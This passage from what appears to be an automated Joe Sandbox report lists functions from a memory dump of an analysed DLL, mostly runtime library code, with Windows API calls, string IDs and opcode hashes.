                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: 7%n$ACP$OCP
                          • API String ID: 2299586839-4090478770
                          • Opcode ID: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
                          • Instruction ID: 69987023b77f53b8312c72898458cf337b6296a8d7c1e5f85c75278e2aa7208e
                          • Opcode Fuzzy Hash: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
                          • Instruction Fuzzy Hash: 8821C1B261410EABE7A08FD9CB04A8777B7EB45B21B568465E91AC7308F732DD60C750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2602BC, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 4168288129-2761157908
                          • Opcode ID: 02aa91295ec9def43dc85f7a9f1a5728085c011abe8ae0ee34ae0d71e42766fb
                          • Instruction ID: 57320f5e2437b0d1e4bb05d3d38a9285e5e8d5c4d69020ea0a35cc1b3ef5503f
                          • Opcode Fuzzy Hash: 02aa91295ec9def43dc85f7a9f1a5728085c011abe8ae0ee34ae0d71e42766fb
                          • Instruction Fuzzy Hash: 32C24A71E1862E8FDB65CEA89D40BDAB3B6EB45305F1442EAD40DE7240E774AEC58F40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25E19F, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D66B
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E25E1F3
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E25E244
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E25E304
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorInfoLastLocale$_free$_abort
                          • String ID:
                          • API String ID: 2829624132-0
                          • Opcode ID: b8c41d4d6aa8561fa59fe2e57612e4cefa2c3f1a24f12513728da2eecd6f3b7e
                          • Instruction ID: b489a2047a231e94e02b38e504c5eccfc7f92995d2226dd6523b5a0a829908c8
                          • Opcode Fuzzy Hash: b8c41d4d6aa8561fa59fe2e57612e4cefa2c3f1a24f12513728da2eecd6f3b7e
                          • Instruction Fuzzy Hash: 5D61027151021FEFEB588FA4CE81BBA77BAEF04305F0044BAE911C6688EB74D961CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E241F6D, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,6E2075D9), ref: 6E242065
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6E2075D9), ref: 6E24206F
                          • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,6E2075D9), ref: 6E24207C
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 289fe437f68452ac271aa0bf2d67dee772a601bd11f70958bd90cfdcfe7dcd59
                          • Instruction ID: cd710127710b1e6eec8707e493ee5de6fd5e7d03253c9aeff4f5ce3b3a532f10
                          • Opcode Fuzzy Hash: 289fe437f68452ac271aa0bf2d67dee772a601bd11f70958bd90cfdcfe7dcd59
                          • Instruction Fuzzy Hash: 7631F3B591122DDBCB61DF64C888BDDBBB9BF08310F5046EAE41CA7250EB709B818F54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24966F, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,6E249645,?,6E2C2D28,0000000C,6E24978A,?), ref: 6E249690
                          • TerminateProcess.KERNEL32(00000000,?,6E249645,?,6E2C2D28,0000000C,6E24978A,?), ref: 6E249697
                          • ExitProcess.KERNEL32 ref: 6E2496A9
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: f8904946f47584ef7224fa9fd7e1e72cce858464b6813a46a32b6b9e2a7b15e8
                          • Instruction ID: d042448101073f7726092af00e043f2e2b0638077aca404e9bc8bc5148471b08
                          • Opcode Fuzzy Hash: f8904946f47584ef7224fa9fd7e1e72cce858464b6813a46a32b6b9e2a7b15e8
                          • Instruction Fuzzy Hash: 1CE0EC7101061DEFCF856F94CE1CE993B7BFF41246F149968F9098A121CB35E962CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25E077, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • EnumSystemLocalesW.KERNEL32(6E25E19F,00000001,00000000,?,;$n,?,6E25E7CC,00000000,?,?,?), ref: 6E25E0E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID: ;$n
                          • API String ID: 1084509184-2794363061
                          • Opcode ID: 11c6b9ad7d8f2f4636e2d9edb2692050f3dba1bac2feb3ab5d564461732029ef
                          • Instruction ID: c5268752b6b21a6ba36eb512e40a4ae5c964d845337742fb4b887dc29805cb74
                          • Opcode Fuzzy Hash: 11c6b9ad7d8f2f4636e2d9edb2692050f3dba1bac2feb3ab5d564461732029ef
                          • Instruction Fuzzy Hash: 6C114C3B2047059FDB089F79C9906BABBA3FF80359B18882CD94787B40D371B952CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25DF65, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D66B
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B$n,00000000,?), ref: 6E25DFB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$InfoLocale_abort
                          • String ID: )'nU$B$n$t!'nE
                          • API String ID: 1663032902-2691769108
                          • Opcode ID: fecf4577095f5a7725a70fa91fd4f48c65a2f9cf289ac8b996cc670c0026fe1e
                          • Instruction ID: 070c26c87fc205cb1a710e4f385427ab01c698bea7a0f81726eed104ee1e730b
                          • Opcode Fuzzy Hash: fecf4577095f5a7725a70fa91fd4f48c65a2f9cf289ac8b996cc670c0026fe1e
                          • Instruction Fuzzy Hash: ABF0F432A5010EEBD7149FB8D848EFB73ADDB45315F0445BAE906DB240EF34AD048BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25E112, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • EnumSystemLocalesW.KERNEL32(6E25E3EF,00000001,00000006,?,;$n,?,6E25E790,;$n,?,?,?,?,?,6E24E03B,?,?), ref: 6E25E15E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID: ;$n
                          • API String ID: 1084509184-2794363061
                          • Opcode ID: c993478e04a960fa24bc651fd01b3635cb726ab7a21e2171dc5c512deb6dc764
                          • Instruction ID: 8588b83bd66dadfff62ad15be9efa28ae53a4f2d4b1ed8f883b9019257b311bc
                          • Opcode Fuzzy Hash: c993478e04a960fa24bc651fd01b3635cb726ab7a21e2171dc5c512deb6dc764
                          • Instruction Fuzzy Hash: 39F0C2762043096FD7146FB9CD80A6A7BA7EF8176CB09842DFA068B740D671AC41CA50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E254323, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,6E24DA1E,?,00000004), ref: 6E254376
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: GetLocaleInfoEx
                          • API String ID: 2299586839-2904428671
                          • Opcode ID: 91ee40b5ffc5123031bf5ebba5c07fe95f63e086dfedb6de1f60e2f868c52316
                          • Instruction ID: 69537425614e064cb6d92b0bbc000163847fa0dba9547c4b740c1021efeb8df1
                          • Opcode Fuzzy Hash: 91ee40b5ffc5123031bf5ebba5c07fe95f63e086dfedb6de1f60e2f868c52316
                          • Instruction Fuzzy Hash: 7CF0CD3194161CBBCF115FE08C08EAF7BA7EF49601F104545FC156A350CB328A209AA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E235150, Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
                          • Instruction ID: fc724374c75bd5d6ca4ab59dbacb14a7ba219d73294d4f4f61d83fff8a468e5b
                          • Opcode Fuzzy Hash: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
                          • Instruction Fuzzy Hash: FA024EB1E5022A9FDB14CFA9C89069DF7F6FF88315F25826AD919E7344D730A9418F80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E250396, Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E250391,?,?,00000008,?,?,6E263E64,00000000), ref: 6E2505C3
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: b7281d7e929025f6a99127b309e80d3231c12e82d9bbb37aeb10fa17755ed010
                          • Instruction ID: 94b8b24184486c6a78cb0150605c6d54269d58d406fc2b4e0250a2c8a1ad7ce2
                          • Opcode Fuzzy Hash: b7281d7e929025f6a99127b309e80d3231c12e82d9bbb37aeb10fa17755ed010
                          • Instruction Fuzzy Hash: 6FB1BC3112060A8FD704CF68C996F657BE2FF45369F258658E8A9CF3A1D335E9A1CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25E3EF, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D66B
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E25E443
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$InfoLocale_abort
                          • String ID:
                          • API String ID: 1663032902-0
                          • Opcode ID: 22521fcaf741af358c8dcf1959a4be017b2f123ca5be826dd0f236ec5b4642f2
                          • Instruction ID: da4aa7572b4958cb38846d9e34e8944f05fc68ffe708de95caf6d6bbd1faff0f
                          • Opcode Fuzzy Hash: 22521fcaf741af358c8dcf1959a4be017b2f123ca5be826dd0f236ec5b4642f2
                          • Instruction Fuzzy Hash: 4321C17692421F9BDB188BA4CD45BBA73AEEF00325F00407AED01C6244EF749954DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25E61F, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6E25E3BD,00000000,00000000,?), ref: 6E25E64B
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$InfoLocale_abort_free
                          • String ID:
                          • API String ID: 2692324296-0
                          • Opcode ID: 78469dbd648527aca6e70de360f3c2de1987a66e35c7bba1667dd13229a76a76
                          • Instruction ID: fcf036781d1056c13554fcf12e33c32360bf9da21b036691b4ca13d7534efb0f
                          • Opcode Fuzzy Hash: 78469dbd648527aca6e70de360f3c2de1987a66e35c7bba1667dd13229a76a76
                          • Instruction Fuzzy Hash: EEF04E3661411B6FDB144BD4C905BBB3769EB00369F01442ADD15A3240EA70FD11CAD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E253952, Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E242361: EnterCriticalSection.KERNEL32(-000BFC7F,?,6E2492B1,00000000,6E2C2CE8,0000000C,6E24926C,?,?,?,6E24C822,?,?,6E24D6B4,00000001,00000364), ref: 6E242370
                          • EnumSystemLocalesW.KERNEL32(6E25390C,00000001,6E2C3078,0000000C), ref: 6E25398A
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalEnterEnumLocalesSectionSystem
                          • String ID:
                          • API String ID: 1272433827-0
                          • Opcode ID: a0bfb52c658e0802913f11a0cbc6835c52cf010153108ed149eba7eea0597b12
                          • Instruction ID: 5d1bff0ec32b92611c2cd97dc2d1dbb8541a7befe2c8923d69e07add4d7a4b19
                          • Opcode Fuzzy Hash: a0bfb52c658e0802913f11a0cbc6835c52cf010153108ed149eba7eea0597b12
                          • Instruction Fuzzy Hash: 47F03776950608EFDB54DFA8C44DB9D3BF2BB06B24F108956E810DB291CB749940DF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25E00E, Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • EnumSystemLocalesW.KERNEL32(6E25DF65,00000001,00000006,?,?,6E25E7EE,;$n,?,?,?,?,?,6E24E03B,?,?,?), ref: 6E25E045
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID:
                          • API String ID: 1084509184-0
                          • Opcode ID: 311b9bf6d4d057f1019f2672fc74a38ee296865ed68604af18f2cec709b53045
                          • Instruction ID: 2356b37d2de94d25240dfa275c7a893b62f0875a67eab357b3aae102bf17e625
                          • Opcode Fuzzy Hash: 311b9bf6d4d057f1019f2672fc74a38ee296865ed68604af18f2cec709b53045
                          • Instruction Fuzzy Hash: 71F0E53A30024A57CB089F79CA4466A7FE6EFC1719B0A4059EA098B740CA75D842CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E23E079, Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
